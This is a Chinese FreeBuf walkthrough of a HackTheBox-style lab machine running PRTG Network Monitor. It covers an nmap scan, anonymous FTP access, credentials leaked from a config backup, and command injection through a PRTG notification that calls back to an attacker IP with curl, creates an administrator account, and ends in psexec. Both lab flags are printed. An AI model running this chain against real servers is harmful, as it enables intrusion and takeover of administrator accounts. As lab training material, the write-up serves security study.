官方公众号企业安全新浪微博
FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。
FreeBuf+小程序
| IP Address | Opening Ports |
|---|---|
| 10.10.10.152 | TCP:21,135,139,139,445,5985 |
$ nmap -p- 10.10.10.152 --min-rate 1000 -sC -sV
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-02-19 11:18PM 1024 .rnd
| 02-25-19 09:15PM <DIR> inetpub
| 07-16-16 08:18AM <DIR> PerfLogs
| 02-25-19 09:56PM <DIR> Program Files
| 02-02-19 11:28PM <DIR> Program Files (x86)
| 02-03-19 07:08AM <DIR> Users
|_03-04-19 02:12PM <DIR> Windows
| ftp-syst:
|_ SYST: Windows_NT
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
ftp 10.10.10.152
ftp> get Users/Public/user.txt
User.txt
aef9a99e68e9807ecc4ecf46fc49746b
PRTG 网络监控 RCE
http://10.10.10.152/index.htm
ftp> cd "ProgramData/Paessler/PRTG Network Monitor"
ftp> get "PRTG Configuration.old.bak"
$ cat PRTG\ Configuration.old.bak
username: prtgadminpassword: PrTg@dmin2018
根据日期推断密码也有可能是password: PrTg@dmin2019
Setup > Account Settings > Notifications
添加新通知
;curl http://10.10.16.17/rce
http://10.10.10.152/myaccount.htm?tabid=2
;curl http://10.10.16.17/Run;net user maptnh P0wned /add;curl http://10.10.16.17/UserAdd;net localgroup administrators maptnh /add;curl http://10.10.16.17/Done
$ impacket-psexec 'maptnh:[email protected]'
Root.txt
fbaa6dc557503e828c1675b86665888f
已在FreeBuf发表 0 篇文章
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022